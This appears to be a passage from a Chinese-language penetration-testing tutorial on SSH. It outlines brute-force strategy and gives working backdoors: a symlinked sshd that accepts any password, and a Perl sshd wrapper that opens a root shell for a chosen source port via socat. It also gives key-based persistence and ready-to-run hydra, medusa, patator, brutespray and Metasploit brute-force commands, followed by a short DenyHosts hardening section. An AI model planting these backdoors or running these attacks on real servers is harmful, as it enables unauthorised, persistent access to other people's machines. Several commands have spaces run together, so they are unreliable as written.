2.思路

（1）对root账号进行暴力破解

（2）使用中国姓名top1000作为用户名进行暴力破解

（3）使用top 10000 password字典进行密码破解

（4）利用掌握信息进行社工信息整理并生成字典暴力破解

（5）信息的综合利用以及循环利用

ssh后门

1. 软连接后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su-oPort=33223;

经典后门使用ssh root@x.x.x.x -p 33223直接对sshd建立软连接，之后用任意密码登录即可。

但这隐蔽性很弱，一般的rookit hunter这类的防护脚本可扫描到。

2.SSH Server wrapper后门

（1）复制sshd到bin目录

cd /usr/sbin

mv sshd ../bin

（2）编辑sshd

vi sshd //加入以下内容并保存

#!/usr/bin/perl

exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);

exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

（4）修改权限

chmod 755 sshd

（5）使用socat

socat STDIOTCP4:target_ip:22,sourceport=19526

如果没有安装socat需要进行安装并编译

wget http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz

tar -zxvf socat-1.7.3.2.tar.gz

cd socat-1.7.3.2

./configure

make

make install

（6）使用ssh root@ target_ip即可免密码登录

3.ssh公钥免密

将本地计算机生成公私钥，将公钥文件复制到需要连接的服务器上的~/.ssh/authorized_keys文件，并设置相应的权限，即可免密码登录服务器。

chmod 600 ~/.ssh/authorized_keys

chmod 700 ~/.ssh

ssh暴力破解命令总结及分析

1.所有工具的比较

通过对hydra、medusa、patator、brutepray以及msf下的ssh暴力破解测试，总结如下：

（1）每款软件都能成功对ssh账号以及密码进行破解。

（2）patator和brutepray是通过python语言编写，但brutepray需要medusa配合支持。

（3）hydra和medusa是基于C语言编写的，需要进行编译。

（4）brutepray基于nmap扫描结果来进行暴力破解，在对内网扫描后进行暴力破解效果好。

（5）patator基于python，速度快，兼容性好，可以在windows或者linux下稍作配置即可使用。

（6）如果具备kali条件或者PentestBox下，使用msf进行ssh暴力破解也不错。

（7）brutepray会自动生成破解成功日志文件/brutespray-output/ssh-success.txt；hydra加参数“-o save.log”记录破解成功到日志文件save.log，medusa加“-O ssh.log”参数可以将成功破解的记录记录到ssh.log文件中；patator可以加参数“-x ignore:mesg=’Authentication failed.’”来忽略破解失败的尝试，而仅仅显示成功的破解。

2.命令总结

（1）hydra破解ssh密码

hydra -lroot  -P pwd2.dic -t 1 -vV -e ns 192.168.44.139ssh

hydra -lroot  -P pwd2.dic -t 1 -vV -e ns  -o save.log  192.168.44.139  ssh

（2）medusa破解ssh密码

medusa -M ssh -h 192.168.157.131 -u root -Pnewpass.txt

medusa -M ssh -h192.168.157.131 -u root -P /root/newpass.txt -e ns –F

（3）patator破解ssh密码

./patator.py ssh_login host=192.168.157.131user=root password=FILE0 0=/root/newpass.txt -x ignore:mesg='Authenticationfailed.'

./patator.py ssh_login host=192.168.157.131user=FILE1 1=/root/user.txt password=FILE0 0=/root/newpass.txt -x ignore:mesg='Authenticationfailed.'

如果不是本地安装，则使用patator执行即可。

（4）brutespray暴力破解ssh密码

nmap -A-p 22 -v 192.168.17.0/24 -oX 22.xml

pythonbrutespray.py --file 22.xml -u root -p toor --threads 5 --hosts 5

（5）msf暴力破解ssh密码

use auxiliary/scanner/ssh/ssh_login

set rhosts192.168.17.147

setPASS_FILE /root/pass.txt

setUSER_FILE /root/user.txt

run

九、 SSH暴力破解安全防范

1.修改/etc/ssh/sshd_config默认端口为其它端口。例如设置端口为2232，则port=2232

2.在/etc/hosts.allow中设置允许的IP访问，例如sshd:192.168.17.144:allow

3.使用DenyHosts软件来设置，其下载地址：

https://sourceforge.net/projects/denyhosts/files/denyhosts/2.6/DenyHosts-2.6.tar.gz/download

（1）安装cdDenyHosts

# tar-zxvf DenyHosts-2.6.tar.gz

# cdDenyHosts-2.6

# pythonsetup.py install

默认是安装到/usr/share/denyhosts目录的。

（2）配置cdDenyHosts

# cd/usr/share/denyhosts/

# cpdenyhosts.cfg-dist denyhosts.cfg

# videnyhosts.cfg

PURGE_DENY= 50m #过多久后清除已阻止IP

HOSTS_DENY= /etc/hosts.deny #将阻止IP写入到hosts.deny

BLOCK_SERVICE= sshd #阻止服务名

DENY_THRESHOLD_INVALID= 1 #允许无效用户登录失败的次数

DENY_THRESHOLD_VALID= 10 #允许普通用户登录失败的次数

DENY_THRESHOLD_ROOT= 5 #允许root登录失败的次数

WORK_DIR= /usr/local/share/denyhosts/data #将deny的host或ip纪录到Work_dir中

DENY_THRESHOLD_RESTRICTED= 1 #设定 deny host 写入到该资料夹

LOCK_FILE= /var/lock/subsys/denyhosts #将DenyHOts启动的pid纪录到LOCK_FILE中，已确保服务正确启动，防止同时启动多个服务。

HOSTNAME_LOOKUP=NO#是否做域名反解

ADMIN_EMAIL= #设置管理员邮件地址

DAEMON_LOG= /var/log/denyhosts #自己的日志文件

DAEMON_PURGE= 10m #该项与PURGE_DENY 设置成一样，也是清除hosts.deniedssh 用户的时间。

（3）设置启动脚本

# cpdaemon-control-dist daemon-control

# chownroot daemon-control

# chmod700 daemon-control

完了之后执行daemon-contronstart就可以了。

#./daemon-control start

如果要使DenyHosts每次重起后自动启动还需做如下设置：

# ln -s/usr/share/denyhosts/daemon-control /etc/init.d/denyhosts

#chkconfig --add denyhosts

#chkconfig denyhosts on

#service denyhosts start

可以看看/etc/hosts.deny内是否有禁止的IP，有的话说明已经成功了。

以上内容来之本次专题研究内容之一，只有踏踏实实的做技术研究，才发现研究越多，知识面扩展越多。